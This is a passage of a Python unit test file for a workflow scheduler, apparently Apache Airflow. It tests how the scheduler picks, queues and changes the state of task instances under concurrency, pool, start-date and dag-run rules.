states=[State.SCHEDULED],
session=session)
session.commit()
self.assertEqual(3, len(res))
res_keys = []
for ti in res:
res_keys.append(ti.key)
self.assertIn(tis[0].key, res_keys)
self.assertIn(tis[1].key, res_keys)
self.assertIn(tis[3].key, res_keys)
def test_nonexistent_pool(self):
dag_id = 'SchedulerJobTest.test_nonexistent_pool'
task_id = 'dummy_wrong_pool'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
task = DummyOperator(dag=dag, task_id=task_id, pool="this_pool_doesnt_exist")
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr = scheduler.create_dag_run(dag)
ti = TI(task, dr.execution_date)
ti.state = State.SCHEDULED
session.merge(ti)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
session.commit()
self.assertEqual(0, len(res))
def test_find_executable_task_instances_none(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_none'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
scheduler.create_dag_run(dag)
session.commit()
self.assertEqual(0, len(scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)))
def test_find_executable_task_instances_concurrency(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_concurrency'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=2)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr3 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
ti2 = TI(task1, dr2.execution_date)
ti3 = TI(task1, dr3.execution_date)
ti1.state = State.RUNNING
ti2.state = State.SCHEDULED
ti3.state = State.SCHEDULED
session.merge(ti1)
session.merge(ti2)
session.merge(ti3)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(1, len(res))
res_keys = map(lambda x: x.key, res)
self.assertIn(ti2.key, res_keys)
ti2.state = State.RUNNING
session.merge(ti2)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(0, len(res))
def test_find_executable_task_instances_concurrency_queued(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_concurrency_queued'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=3)
task1 = DummyOperator(dag=dag, task_id='dummy1')
task2 = DummyOperator(dag=dag, task_id='dummy2')
task3 = DummyOperator(dag=dag, task_id='dummy3')
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dag_run = scheduler.create_dag_run(dag)
ti1 = TI(task1, dag_run.execution_date)
ti2 = TI(task2, dag_run.execution_date)
ti3 = TI(task3, dag_run.execution_date)
ti1.state = State.RUNNING
ti2.state = State.QUEUED
ti3.state = State.SCHEDULED
session.merge(ti1)
session.merge(ti2)
session.merge(ti3)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(1, len(res))
self.assertEqual(res[0].key, ti3.key)
    def test_find_executable_task_instances_task_concurrency(self):
        """task_concurrency on an operator caps how many of its instances
        may run at once, independently of the DAG-level concurrency."""
        dag_id = 'SchedulerJobTest.test_find_executable_task_instances_task_concurrency'
        task_id_1 = 'dummy'
        task_id_2 = 'dummy2'
        dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
        # task1 may have at most 2 concurrently running instances.
        task1 = DummyOperator(dag=dag, task_id=task_id_1, task_concurrency=2)
        task2 = DummyOperator(dag=dag, task_id=task_id_2)
        dagbag = self._make_simple_dag_bag([dag])
        scheduler = SchedulerJob()
        session = settings.Session()
        dr1 = scheduler.create_dag_run(dag)
        dr2 = scheduler.create_dag_run(dag)
        dr3 = scheduler.create_dag_run(dag)
        # Nothing running yet: both SCHEDULED instances are executable.
        ti1_1 = TI(task1, dr1.execution_date)
        ti2 = TI(task2, dr1.execution_date)
        ti1_1.state = State.SCHEDULED
        ti2.state = State.SCHEDULED
        session.merge(ti1_1)
        session.merge(ti2)
        session.commit()
        res = scheduler._find_executable_task_instances(
            dagbag,
            states=[State.SCHEDULED],
            session=session)
        self.assertEqual(2, len(res))
        # One task1 instance running: a second one still fits (limit 2).
        ti1_1.state = State.RUNNING
        ti2.state = State.RUNNING
        ti1_2 = TI(task1, dr2.execution_date)
        ti1_2.state = State.SCHEDULED
        session.merge(ti1_1)
        session.merge(ti2)
        session.merge(ti1_2)
        session.commit()
        res = scheduler._find_executable_task_instances(
            dagbag,
            states=[State.SCHEDULED],
            session=session)
        self.assertEqual(1, len(res))
        # Two task1 instances running: the limit is reached, nothing runs.
        ti1_2.state = State.RUNNING
        ti1_3 = TI(task1, dr3.execution_date)
        ti1_3.state = State.SCHEDULED
        session.merge(ti1_2)
        session.merge(ti1_3)
        session.commit()
        res = scheduler._find_executable_task_instances(
            dagbag,
            states=[State.SCHEDULED],
            session=session)
        self.assertEqual(0, len(res))
        # All three back to SCHEDULED: only 2 can be picked.
        ti1_1.state = State.SCHEDULED
        ti1_2.state = State.SCHEDULED
        ti1_3.state = State.SCHEDULED
        session.merge(ti1_1)
        session.merge(ti1_2)
        session.merge(ti1_3)
        session.commit()
        res = scheduler._find_executable_task_instances(
            dagbag,
            states=[State.SCHEDULED],
            session=session)
        self.assertEqual(2, len(res))
        # One running again: exactly one slot remains.
        ti1_1.state = State.RUNNING
        ti1_2.state = State.SCHEDULED
        ti1_3.state = State.SCHEDULED
        session.merge(ti1_1)
        session.merge(ti1_2)
        session.merge(ti1_3)
        session.commit()
        res = scheduler._find_executable_task_instances(
            dagbag,
            states=[State.SCHEDULED],
            session=session)
        self.assertEqual(1, len(res))
def test_change_state_for_executable_task_instances_no_tis(self):
scheduler = SchedulerJob()
session = settings.Session()
res = scheduler._change_state_for_executable_task_instances(
[], [State.NONE], session)
self.assertEqual(0, len(res))
    def test_change_state_for_executable_task_instances_no_tis_with_state(self):
        """Task instances whose current state is not in the acceptable-states
        list are not transitioned, so nothing is returned."""
        dag_id = 'SchedulerJobTest.test_change_state_for__no_tis_with_state'
        task_id_1 = 'dummy'
        dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=2)
        task1 = DummyOperator(dag=dag, task_id=task_id_1)
        self._make_simple_dag_bag([dag])
        scheduler = SchedulerJob()
        session = settings.Session()
        dr1 = scheduler.create_dag_run(dag)
        dr2 = scheduler.create_dag_run(dag)
        dr3 = scheduler.create_dag_run(dag)
        ti1 = TI(task1, dr1.execution_date)
        ti2 = TI(task1, dr2.execution_date)
        ti3 = TI(task1, dr3.execution_date)
        ti1.state = State.SCHEDULED
        ti2.state = State.SCHEDULED
        ti3.state = State.SCHEDULED
        session.merge(ti1)
        session.merge(ti2)
        session.merge(ti3)
        session.commit()
        # All TIs are SCHEDULED but only RUNNING is acceptable -> empty result.
        res = scheduler._change_state_for_executable_task_instances(
            [ti1, ti2, ti3],
            [State.RUNNING],
            session)
        self.assertEqual(0, len(res))
    def test_change_state_for_executable_task_instances_none_state(self):
        """Task instances in an acceptable state (NONE / SCHEDULED here) are
        switched to QUEUED; the already-QUEUED one is filtered out."""
        dag_id = 'SchedulerJobTest.test_change_state_for__none_state'
        task_id_1 = 'dummy'
        dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=2)
        task1 = DummyOperator(dag=dag, task_id=task_id_1)
        self._make_simple_dag_bag([dag])
        scheduler = SchedulerJob()
        session = settings.Session()
        dr1 = scheduler.create_dag_run(dag)
        dr2 = scheduler.create_dag_run(dag)
        dr3 = scheduler.create_dag_run(dag)
        ti1 = TI(task1, dr1.execution_date)
        ti2 = TI(task1, dr2.execution_date)
        ti3 = TI(task1, dr3.execution_date)
        ti1.state = State.SCHEDULED
        ti2.state = State.QUEUED
        ti3.state = State.NONE
        session.merge(ti1)
        session.merge(ti2)
        session.merge(ti3)
        session.commit()
        res = scheduler._change_state_for_executable_task_instances(
            [ti1, ti2, ti3],
            [State.NONE, State.SCHEDULED],
            session)
        # ti1 (SCHEDULED) and ti3 (NONE) match; ti2 (QUEUED) does not.
        self.assertEqual(2, len(res))
        ti1.refresh_from_db()
        ti3.refresh_from_db()
        self.assertEqual(State.QUEUED, ti1.state)
        self.assertEqual(State.QUEUED, ti3.state)
    def test_enqueue_task_instances_with_queued_state(self):
        """Enqueueing hands the task instances to the executor through
        BaseExecutor.queue_command."""
        dag_id = 'SchedulerJobTest.test_enqueue_task_instances_with_queued_state'
        task_id_1 = 'dummy'
        dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
        task1 = DummyOperator(dag=dag, task_id=task_id_1)
        dagbag = self._make_simple_dag_bag([dag])
        scheduler = SchedulerJob()
        session = settings.Session()
        dr1 = scheduler.create_dag_run(dag)
        ti1 = TI(task1, dr1.execution_date)
        session.merge(ti1)
        session.commit()
        # Patch the executor entry point to observe the hand-off.
        with patch.object(BaseExecutor, 'queue_command') as mock_queue_command:
            scheduler._enqueue_task_instances_with_queued_state(dagbag, [ti1])
        mock_queue_command.assert_called()
    def test_execute_task_instances_nothing(self):
        """With an empty SimpleDagBag no task instance can be matched, so
        zero task instances are executed."""
        dag_id = 'SchedulerJobTest.test_execute_task_instances_nothing'
        task_id_1 = 'dummy'
        dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=2)
        task1 = DummyOperator(dag=dag, task_id=task_id_1)
        dagbag = SimpleDagBag([])
        scheduler = SchedulerJob()
        session = settings.Session()
        dr1 = scheduler.create_dag_run(dag)
        ti1 = TI(task1, dr1.execution_date)
        ti1.state = State.SCHEDULED
        session.merge(ti1)
        session.commit()
        self.assertEqual(0, scheduler._execute_task_instances(dagbag, states=[State.SCHEDULED]))
    def test_execute_task_instances(self):
        """End-to-end check that _execute_task_instances respects DAG-level
        concurrency across multiple dag runs."""
        dag_id = 'SchedulerJobTest.test_execute_task_instances'
        task_id_1 = 'dummy_task'
        task_id_2 = 'dummy_task_nonexistent_queue'
        # important that len(tasks) is less than concurrency
        # because before scheduler._execute_task_instances would only
        # check the num tasks once so if concurrency was 3,
        # we could execute arbitrarily many tasks in the second run
        dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=3)
        task1 = DummyOperator(dag=dag, task_id=task_id_1)
        task2 = DummyOperator(dag=dag, task_id=task_id_2)
        dagbag = self._make_simple_dag_bag([dag])
        scheduler = SchedulerJob()
        session = settings.Session()
        # create first dag run with 1 running and 1 queued
        dr1 = scheduler.create_dag_run(dag)
        ti1 = TI(task1, dr1.execution_date)
        ti2 = TI(task2, dr1.execution_date)
        ti1.refresh_from_db()
        ti2.refresh_from_db()
        ti1.state = State.RUNNING
        ti2.state = State.RUNNING
        session.merge(ti1)
        session.merge(ti2)
        session.commit()
        self.assertEqual(State.RUNNING, dr1.state)
        self.assertEqual(
            2,
            DAG.get_num_task_instances(
                dag_id, dag.task_ids, states=[State.RUNNING], session=session
            )
        )
        # create second dag run
        dr2 = scheduler.create_dag_run(dag)
        ti3 = TI(task1, dr2.execution_date)
        ti4 = TI(task2, dr2.execution_date)
        ti3.refresh_from_db()
        ti4.refresh_from_db()
        # manually set to scheduled so we can pick them up
        ti3.state = State.SCHEDULED
        ti4.state = State.SCHEDULED
        session.merge(ti3)
        session.merge(ti4)
        session.commit()
        self.assertEqual(State.RUNNING, dr2.state)
        res = scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
        # check that concurrency is respected
        ti1.refresh_from_db()
        ti2.refresh_from_db()
        ti3.refresh_from_db()
        ti4.refresh_from_db()
        # 2 running + at most 1 newly queued = 3 == dag concurrency.
        self.assertEqual(
            3,
            DAG.get_num_task_instances(
                dag_id, dag.task_ids, states=[State.RUNNING, State.QUEUED], session=session
            )
        )
        self.assertEqual(State.RUNNING, ti1.state)
        self.assertEqual(State.RUNNING, ti2.state)
        # Exactly one of ti3/ti4 got queued; the other stayed scheduled.
        six.assertCountEqual(self, [State.QUEUED, State.SCHEDULED], [ti3.state, ti4.state])
        self.assertEqual(1, res)
def test_execute_task_instances_limit(self):
dag_id = 'SchedulerJobTest.test_execute_task_instances_limit'
task_id_1 = 'dummy_task'
task_id_2 = 'dummy_task_2'
# important that len(tasks) is less than concurrency
# because before scheduler._execute_task_instances would only
# check the num tasks once so if concurrency was 3,
# we could execute arbitrarily many tasks in the second run
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
task2 = DummyOperator(dag=dag, task_id=task_id_2)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
scheduler.max_tis_per_query = 3
session = settings.Session()
tis = []
for i in range(0, 4):
dr = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr.execution_date)
ti2 = TI(task2, dr.execution_date)
tis.append(ti1)
tis.append(ti2)
ti1.refresh_from_db()
ti2.refresh_from_db()
ti1.state = State.SCHEDULED
ti2.state = State.SCHEDULED
session.merge(ti1)
session.merge(ti2)
session.commit()
res = scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
self.assertEqual(8, res)
for ti in tis:
ti.refresh_from_db()
self.assertEqual(State.QUEUED, ti.state)
@unittest.skipUnless("INTEGRATION" in os.environ,
"The test is flaky with nondeterministic result")
def test_change_state_for_tis_without_dagrun(self):
dag1 = DAG(dag_id='test_change_state_for_tis_without_dagrun', start_date=DEFAULT_DATE)
DummyOperator(task_id='dummy', dag=dag1, owner='airflow')
DummyOperator(task_id='dummy_b', dag=dag1, owner='airflow')
dag2 = DAG(dag_id='test_change_state_for_tis_without_dagrun_dont_change', start_date=DEFAULT_DATE)
DummyOperator(task_id='dummy', dag=dag2, owner='airflow')
dag3 = DAG(dag_id='test_change_state_for_tis_without_dagrun_no_dagrun', start_date=DEFAULT_DATE)
DummyOperator(task_id='dummy', dag=dag3, owner='airflow')
session = settings.Session()
dr1 = dag1.create_dagrun(run_id=DagRun.ID_PREFIX,
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
dr2 = dag2.create_dagrun(run_id=DagRun.ID_PREFIX,
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti1a = dr1.get_task_instance(task_id='dummy', session=session)
ti1a.state = State.SCHEDULED
ti1b = dr1.get_task_instance(task_id='dummy_b', session=session)
ti1b.state = State.SUCCESS
session.commit()
ti2 = dr2.get_task_instance(task_id='dummy', session=session)
ti2.state = State.SCHEDULED
session.commit()
ti3 = TI(dag3.get_task('dummy'), DEFAULT_DATE)
ti3.state = State.SCHEDULED
session.merge(ti3)
session.commit()
dagbag = self._make_simple_dag_bag([dag1, dag2, dag3])
scheduler = SchedulerJob(num_runs=0, run_duration=0)
scheduler._change_state_for_tis_without_dagrun(
simple_dag_bag=dagbag,
old_states=[State.SCHEDULED, State.QUEUED],
new_state=State.NONE,
session=session)
ti1a = dr1.get_task_instance(task_id='dummy', session=session)
ti1a.refresh_from_db(session=session)
self.assertEqual(ti1a.state, State.SCHEDULED)
ti1b = dr1.get_task_instance(task_id='dummy_b', session=session)
ti1b.refresh_from_db(session=session)
self.assertEqual(ti1b.state, State.SUCCESS)
ti2 = dr2.get_task_instance(task_id='dummy', session=session)
ti2.refresh_from_db(session=session)
self.assertEqual(ti2.state, State.SCHEDULED)
ti3.refresh_from_db(session=session)
self.assertEquals(ti3.state, State.NONE)
dr1.refresh_from_db(session=session)
dr1.state = State.FAILED
# why o why
session.merge(dr1)
session.commit()
scheduler._change_state_for_tis_without_dagrun(
simple_dag_bag=dagbag,
old_states=[State.SCHEDULED, State.QUEUED],
new_state=State.NONE,
session=session)
ti1a.refresh_from_db(session=session)
self.assertEqual(ti1a.state, State.SCHEDULED)
# don't touch ti1b
ti1b.refresh_from_db(session=session)
self.assertEqual(ti1b.state, State.SUCCESS)
# don't touch ti2
ti2.refresh_from_db(session=session)
self.assertEqual(ti2.state, State.SCHEDULED)
def test_change_state_for_tasks_failed_to_execute(self):
dag = DAG(
dag_id='dag_id',
start_date=DEFAULT_DATE)
task = DummyOperator(
task_id='task_id',
dag=dag,
owner='airflow')
# If there's no left over task in executor.queued_tasks, nothing happens
session = settings.Session()
scheduler_job = SchedulerJob()
mock_logger = mock.MagicMock()
test_executor = TestExecutor()
scheduler_job.executor = test_executor
scheduler_job._logger = mock_logger
scheduler_job._change_state_for_tasks_failed_to_execute()
mock_logger.info.assert_not_called()
# Tasks failed to execute with QUEUED state will be set to SCHEDULED state.
session.query(TI).delete()
session.commit()
key = 'dag_id', 'task_id', DEFAULT_DATE, 1
test_executor.queued_tasks[key] = 'value'
ti = TI(task, DEFAULT_DATE)
ti.state = State.QUEUED
session.merge(ti)
session.commit()
scheduler_job._change_state_for_tasks_failed_to_execute()
ti.refresh_from_db()
self.assertEquals(State.SCHEDULED, ti.state)
# Tasks failed to execute with RUNNING state will not be set to SCHEDULED state.
session.query(TI).delete()
session.commit()
ti.state = State.RUNNING
session.merge(ti)
session.commit()
scheduler_job._change_state_for_tasks_failed_to_execute()
ti.refresh_from_db()
self.assertEquals(State.RUNNING, ti.state)
    def test_execute_helper_reset_orphaned_tasks(self):
        """_execute_helper resets orphaned SCHEDULED task instances of
        regular (scheduler) dag runs to NONE, but leaves task instances of
        backfill dag runs untouched."""
        session = settings.Session()
        dag = DAG(
            'test_execute_helper_reset_orphaned_tasks',
            start_date=DEFAULT_DATE,
            default_args={'owner': 'owner1'})
        with dag:
            op1 = DummyOperator(task_id='op1')
        dag.clear()
        dr = dag.create_dagrun(run_id=DagRun.ID_PREFIX,
                               state=State.RUNNING,
                               execution_date=DEFAULT_DATE,
                               start_date=DEFAULT_DATE,
                               session=session)
        # A backfill run: its task instances must NOT be reset.
        dr2 = dag.create_dagrun(run_id=BackfillJob.ID_PREFIX,
                                state=State.RUNNING,
                                execution_date=DEFAULT_DATE + datetime.timedelta(1),
                                start_date=DEFAULT_DATE,
                                session=session)
        ti = dr.get_task_instance(task_id=op1.task_id, session=session)
        ti.state = State.SCHEDULED
        ti2 = dr2.get_task_instance(task_id=op1.task_id, session=session)
        ti2.state = State.SCHEDULED
        session.commit()
        processor = mock.MagicMock()
        scheduler = SchedulerJob(num_runs=0, run_duration=0)
        executor = TestExecutor()
        scheduler.executor = executor
        scheduler.processor_agent = processor
        scheduler._execute_helper()
        ti = dr.get_task_instance(task_id=op1.task_id, session=session)
        self.assertEqual(ti.state, State.NONE)
        ti2 = dr2.get_task_instance(task_id=op1.task_id, session=session)
        self.assertEqual(ti2.state, State.SCHEDULED)
    @provide_session
    def evaluate_dagrun(
            self,
            dag_id,
            expected_task_states,  # dict of task_id: state
            dagrun_state,
            run_kwargs=None,
            advance_execution_date=False,
            session=None):
        """
        Helper for testing DagRun states with simple two-task DAGS.
        This is hackish: a dag run is created but its tasks are
        run by a backfill.

        :param dag_id: id of the DAG (looked up in self.dagbag) to evaluate
        :param expected_task_states: dict of task_id: expected final state
        :param dagrun_state: the state the dag run must end up in
        :param run_kwargs: extra kwargs forwarded to dag.run()
        :param advance_execution_date: create a second dag run so the
            evaluated run's execution_date is after the start_date
        :param session: injected by @provide_session
        """
        if run_kwargs is None:
            run_kwargs = {}
        scheduler = SchedulerJob()
        dag = self.dagbag.get_dag(dag_id)
        dag.clear()
        dr = scheduler.create_dag_run(dag)
        if advance_execution_date:
            # run a second time to schedule a dagrun after the start_date
            dr = scheduler.create_dag_run(dag)
        ex_date = dr.execution_date
        try:
            dag.run(start_date=ex_date, end_date=ex_date, **run_kwargs)
        except AirflowException:
            # A failing task raises; states are still asserted below.
            pass
        # test tasks
        for task_id, expected_state in expected_task_states.items():
            task = dag.get_task(task_id)
            ti = TI(task, ex_date)
            ti.refresh_from_db()
            self.assertEqual(ti.state, expected_state)
        # load dagrun
        dr = DagRun.find(dag_id=dag_id, execution_date=ex_date)
        dr = dr[0]
        dr.dag = dag
        self.assertEqual(dr.state, dagrun_state)
def test_dagrun_fail(self):
"""
DagRuns with one failed and one incomplete root task -> FAILED
"""
self.evaluate_dagrun(
dag_id='test_dagrun_states_fail',
expected_task_states={
'test_dagrun_fail': State.FAILED,
'test_dagrun_succeed': State.UPSTREAM_FAILED,
},
dagrun_state=State.FAILED)
def test_dagrun_success(self):
"""
DagRuns with one failed and one successful root task -> SUCCESS
"""
self.evaluate_dagrun(
dag_id='test_dagrun_states_success',
expected_task_states={
'test_dagrun_fail': State.FAILED,
'test_dagrun_succeed': State.SUCCESS,
},
dagrun_state=State.SUCCESS)
def test_dagrun_root_fail(self):
"""
DagRuns with one successful and one failed root task -> FAILED
"""
self.evaluate_dagrun(
dag_id='test_dagrun_states_root_fail',
expected_task_states={
'test_dagrun_succeed': State.SUCCESS,
'test_dagrun_fail': State.FAILED,
},
dagrun_state=State.FAILED)
    def test_dagrun_root_fail_unfinished(self):
        """
        DagRuns with one unfinished and one failed root task -> RUNNING
        """
        # Run both the failed and successful tasks
        scheduler = SchedulerJob()
        dag_id = 'test_dagrun_states_root_fail_unfinished'
        dag = self.dagbag.get_dag(dag_id)
        dag.clear()
        dr = scheduler.create_dag_run(dag)
        try:
            dag.run(start_date=dr.execution_date, end_date=dr.execution_date)
        except AirflowException:  # Expect an exception since there is a failed task
            pass
        # Mark the successful task as never having run since we want to see if the
        # dagrun will be in a running state despite having an unfinished task.
        with create_session() as session:
            ti = dr.get_task_instance('test_dagrun_unfinished', session=session)
            ti.state = State.NONE
            session.commit()
        dr_state = dr.update_state()
        self.assertEqual(dr_state, State.RUNNING)
def test_dagrun_deadlock_ignore_depends_on_past_advance_ex_date(self):
"""
DagRun is marked a success if ignore_first_depends_on_past=True
Test that an otherwise-deadlocked dagrun is marked as a success
if ignore_first_depends_on_past=True and the dagrun execution_date
is after the start_date.
"""
self.evaluate_dagrun(
dag_id='test_dagrun_states_deadlock',
expected_task_states={
'test_depends_on_past': State.SUCCESS,
'test_depends_on_past_2': State.SUCCESS,
},
dagrun_state=State.SUCCESS,
advance_execution_date=True,
run_kwargs=dict(ignore_first_depends_on_past=True))
def test_dagrun_deadlock_ignore_depends_on_past(self):
"""
Test that ignore_first_depends_on_past doesn't affect results
(this is the same test as
test_dagrun_deadlock_ignore_depends_on_past_advance_ex_date except
that start_date == execution_date so depends_on_past is irrelevant).
"""
self.evaluate_dagrun(
dag_id='test_dagrun_states_deadlock',
expected_task_states={
'test_depends_on_past': State.SUCCESS,
'test_depends_on_past_2': State.SUCCESS,
},
dagrun_state=State.SUCCESS,
run_kwargs=dict(ignore_first_depends_on_past=True))
    def test_scheduler_start_date(self):
        """
        Test that the scheduler respects start_dates, even when DAGS have run
        """
        with create_session() as session:
            dag_id = 'test_start_date_scheduling'
            dag = self.dagbag.get_dag(dag_id)
            dag.clear()
            # This DAG's start_date is in the future, so the scheduler
            # must not create any task instances for it.
            self.assertTrue(dag.start_date > datetime.datetime.utcnow())
            scheduler = SchedulerJob(dag_id,
                                     num_runs=2)
            scheduler.run()
            # zero tasks ran
            self.assertEqual(
                len(session.query(TI).filter(TI.dag_id == dag_id).all()), 0)
            session.commit()
            # previously, running this backfill would kick off the Scheduler
            # because it would take the most recent run and start from there
            # That behavior still exists, but now it will only do so if after the
            # start date
            backfill = BackfillJob(
                dag=dag,
                start_date=DEFAULT_DATE,
                end_date=DEFAULT_DATE)
            backfill.run()
            # one task ran
            self.assertEqual(
                len(session.query(TI).filter(TI.dag_id == dag_id).all()), 1)
            session.commit()
            # Re-running the scheduler must not pick up from the backfill run.
            scheduler = SchedulerJob(dag_id,
                                     num_runs=2)
            scheduler.run()
            # still one task
            self.assertEqual(
                len(session.query(TI).filter(TI.dag_id == dag_id).all()), 1)
            session.commit()
def test_scheduler_task_start_date(self):
"""
Test that the scheduler respects task start dates that are different
from DAG start dates
"""
dag_id = 'test_task_start_date_scheduling'
dag = self.dagbag.get_dag(dag_id)
dag.clear()
scheduler = SchedulerJob(dag_id,
num_runs=2)
scheduler.run()
session = settings.Session()
tiq = session.query(TI).filter(TI.dag_id == dag_id)
ti1s = tiq.filter(TI.task_id == 'dummy1').all()
ti2s = tiq.filter(TI.task_id == 'dummy2').all()
self.assertEqual(len(ti1s), 0)
self.assertEqual(len(ti2s), 2)
for t in ti2s:
self.assertEqual(t.state, State.SUCCESS)
def test_scheduler_multiprocessing(self):
"""
Test that the scheduler can successfully queue multiple dags in parallel
"""
dag_ids = ['test_start_date_scheduling', 'test_dagrun_states_success']
for dag_id in dag_ids:
dag = self.dagbag.get_dag(dag_id)
dag.clear()
scheduler = SchedulerJob(dag_ids=dag_ids,
num_runs=2)
scheduler.run()
# zero tasks ran
dag_id = 'test_start_date_scheduling'
session = settings.Session()
self.assertEqual(
len(session.query(TI).filter(TI.dag_id == dag_id).all()), 0)
def test_scheduler_dagrun_once(self):
"""
Test if the scheduler does not create multiple dagruns
if a dag is scheduled with @once and a start_date
"""
dag = DAG(
'test_scheduler_dagrun_once',
start_date=timezone.datetime(2015, 1, 1),
schedule_interval="@once")
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
dr = scheduler.create_dag_run(dag)
self.assertIsNone(dr)
    def test_scheduler_process_task_instances(self):
        """
        Test if _process_task_instances puts the right task instances into the
        queue.
        """
        dag = DAG(
            dag_id='test_scheduler_process_execute_task',
            start_date=DEFAULT_DATE)
        dag_task1 = DummyOperator(
            task_id='dummy',
            dag=dag,
            owner='airflow')
        # Register the DAG in the metadata DB so the scheduler can see it.
        session = settings.Session()
        orm_dag = DagModel(dag_id=dag.dag_id)
        session.merge(orm_dag)
        session.commit()
        session.close()
        scheduler = SchedulerJob()
        dag.clear()
        dr = scheduler.create_dag_run(dag)
        self.assertIsNotNone(dr)
        # The scheduler should append exactly this ti key to the queue.
        queue = Mock()
        scheduler._process_task_instances(dag, queue=queue)
        queue.append.assert_called_with(
            (dag.dag_id, dag_task1.task_id, DEFAULT_DATE, TRY_NUMBER)
        )
    def test_scheduler_do_not_schedule_removed_task(self):
        """A task removed from the DAG must not be queued for an older run."""
        dag = DAG(
            dag_id='test_scheduler_do_not_schedule_removed_task',
            start_date=DEFAULT_DATE)
        DummyOperator(
            task_id='dummy',
            dag=dag,
            owner='airflow')
        session = settings.Session()
        orm_dag = DagModel(dag_id=dag.dag_id)
        session.merge(orm_dag)
        session.commit()
        session.close()
        scheduler = SchedulerJob()
        dag.clear()
        dr = scheduler.create_dag_run(dag)
        self.assertIsNotNone(dr)
        # Re-create the DAG without the task: the existing dagrun now refers
        # to a task that no longer exists, which must not be scheduled.
        dag = DAG(
            dag_id='test_scheduler_do_not_schedule_removed_task',
            start_date=DEFAULT_DATE)
        queue = Mock()
        scheduler._process_task_instances(dag, queue=queue)
        queue.put.assert_not_called()
    def test_scheduler_do_not_schedule_too_early(self):
        """No dagrun or ti may be created before the DAG's start_date."""
        dag = DAG(
            dag_id='test_scheduler_do_not_schedule_too_early',
            start_date=timezone.datetime(2200, 1, 1))
        DummyOperator(
            task_id='dummy',
            dag=dag,
            owner='airflow')
        session = settings.Session()
        orm_dag = DagModel(dag_id=dag.dag_id)
        session.merge(orm_dag)
        session.commit()
        session.close()
        scheduler = SchedulerJob()
        dag.clear()
        # start_date 2200-01-01 is far in the future, so no run is created.
        dr = scheduler.create_dag_run(dag)
        self.assertIsNone(dr)
        queue = Mock()
        scheduler._process_task_instances(dag, queue=queue)
        queue.put.assert_not_called()
    def test_scheduler_do_not_run_finished(self):
        """Task instances already in SUCCESS must not be queued again."""
        dag = DAG(
            dag_id='test_scheduler_do_not_run_finished',
            start_date=DEFAULT_DATE)
        DummyOperator(
            task_id='dummy',
            dag=dag,
            owner='airflow')
        session = settings.Session()
        orm_dag = DagModel(dag_id=dag.dag_id)
        session.merge(orm_dag)
        session.commit()
        scheduler = SchedulerJob()
        dag.clear()
        dr = scheduler.create_dag_run(dag)
        self.assertIsNotNone(dr)
        # Mark every ti of the run as finished before processing.
        tis = dr.get_task_instances(session=session)
        for ti in tis:
            ti.state = State.SUCCESS
        session.commit()
        session.close()
        queue = Mock()
        scheduler._process_task_instances(dag, queue=queue)
        queue.put.assert_not_called()
    def test_scheduler_add_new_task(self):
        """
        Test if a task instance will be added if the dag is updated
        """
        dag = DAG(
            dag_id='test_scheduler_add_new_task',
            start_date=DEFAULT_DATE)
        DummyOperator(
            task_id='dummy',
            dag=dag,
            owner='airflow')
        session = settings.Session()
        orm_dag = DagModel(dag_id=dag.dag_id)
        session.merge(orm_dag)
        session.commit()
        session.close()
        scheduler = SchedulerJob()
        dag.clear()
        dr = scheduler.create_dag_run(dag)
        self.assertIsNotNone(dr)
        # The run starts with the single original task.
        tis = dr.get_task_instances()
        self.assertEquals(len(tis), 1)
        # Add a second task to the (already-running) DAG ...
        DummyOperator(
            task_id='dummy2',
            dag=dag,
            owner='airflow')
        queue = Mock()
        scheduler._process_task_instances(dag, queue=queue)
        # ... and verify a ti for it was added to the existing dagrun.
        tis = dr.get_task_instances()
        self.assertEquals(len(tis), 2)
    def test_scheduler_verify_max_active_runs(self):
        """
        Test if a dagrun will not be scheduled if max_dag_runs has been reached
        """
        dag = DAG(
            dag_id='test_scheduler_verify_max_active_runs',
            start_date=DEFAULT_DATE)
        # Only one run may be active at a time.
        dag.max_active_runs = 1
        DummyOperator(
            task_id='dummy',
            dag=dag,
